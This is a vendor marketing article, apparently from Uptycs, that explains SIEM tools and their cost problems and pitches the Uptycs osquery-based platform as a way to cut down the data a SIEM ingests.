Having the ability to aggregate and analyze data across multiple systems is a necessity for companies of all sizes, primarily for security and compliance reasons. For most businesses, SIEM (security information and event management) tools fulfill this function. But SIEM solutions as they are traditionally used can be costly, a problem that eventually leads most security professionals to make important decisions based on dollars and cents rather than actual security needs.
That doesn’t have to be the case.
There’s no disputing the advantages of SIEMs, but there are ways to modify your workflow so you retain access to all the SIEM benefits of data logging without incurring significant costs. This article touches on some of the basics regarding SIEM usage, and offers a way to enhance your SIEM’s capabilities so it becomes more cost-effective.
You can cut SIEM costs without sacrificing endpoint security observability. Learn how.
At its core, SIEM technology aggregates and stores data, making it available for use in a wide variety of applications. Many organizations use SIEM to meet compliance requirements (SOC 2, HIPAA, PCI, etc.), but large enterprises also use SIEM as an integral part of their threat management program. It’s the ideal way to gather data from various sources—network devices, servers, endpoints, and more—and analyze it for possible security threats. Security notifications that arise from SIEM systems can then be investigated further to determine the appropriate response from your security team.
Data collection and analysis is a necessary element of any mature security program, but why use a SIEM for this work? Benefits of a SIEM are:
The above listed advantages are the reason SIEM solutions are so popular in enterprises today. But the major disadvantage of a SIEM—the cost—actually diminishes some of those advantages, making it hard for organizations to get the maximum value from the tool.
That’s because most SIEM players (with the exception of a few vendors) charge based on data ingested—usually gigabytes per day or events per second (EPS). But this is very difficult to predict. Organizations typically sign up for an estimated amount of EPS initially but need more later, and the costs continue to increase. At some point, further decisions about increasing the capability of the SIEM revolve around money, as opposed to solving the challenges the SIEM is intended to address. And as a result a security program can suffer because when an incident does occur, the data isn't there to either detect it proactively OR investigate it after the fact.
One way to address this challenge—and to make your SIEM more cost-efficient—is to enhance your SIEM workflow with the addition of the Uptycs security analytics platform. Uptycs is not a SIEM itself, but it augments SIEM systems in such a way that it reduces the amount of data being processed, therefore reducing the overall cost. Often times, even at this lower cost, Uptycs is providing net new data that helps close infrastructure blind spots and aid in investigations.
A traditional SIEM workflow looks like this:
Data logs → SIEM processing → Output
Large organizations feed incredible amounts of data into a SIEM, much of it from production servers and employee workstations, which are frequently the target of attacks. As processing costs increase, many organizations start to limit the data they pull from endpoints (even though they know it’s useful), compromising the effectiveness of their security program.
Uptycs couples the osquery agent with a powerful analytics engine to collect system data from endpoints across your organization—everything from servers and workstations to virtual machines, cloud instances, and containers—and store and aggregate it to enable valuable correlations and anomaly detection. It forwards to the SIEM only the necessary data—with context—related to the specific alerts or workflows that you care about. If you need more data from Uptycs, to aid in an investigation for example, it can be retrieved automatically through our API.
In this way it offloads some of the data collection and analytics from your SIEM system onto the Uptycs platform, enabling significant cost savings in data storage. (And Uptycs doesn’t charge by EPS or gigabytes per day.)
Here’s how the new workflow looks using Uptycs:
Data logs → Uptycs (e.g. alert) → SIEM → Output
And while a SIEM is certainly scalable, it’s not necessarily designed with performance in mind. That means it could take hours to actually retrieve the results of your queries. Uptycs has the ability to not only index data quickly, but to respond to a query in seconds, giving you instant access to information so you can solve for security challenges quickly and easily.
If you’d like to read about our security platform in more detail, read our white paper, Trifecta of Security @ Scale; or, schedule a live demo to find out how Uptycs can be easily integrated into your SIEM workflow.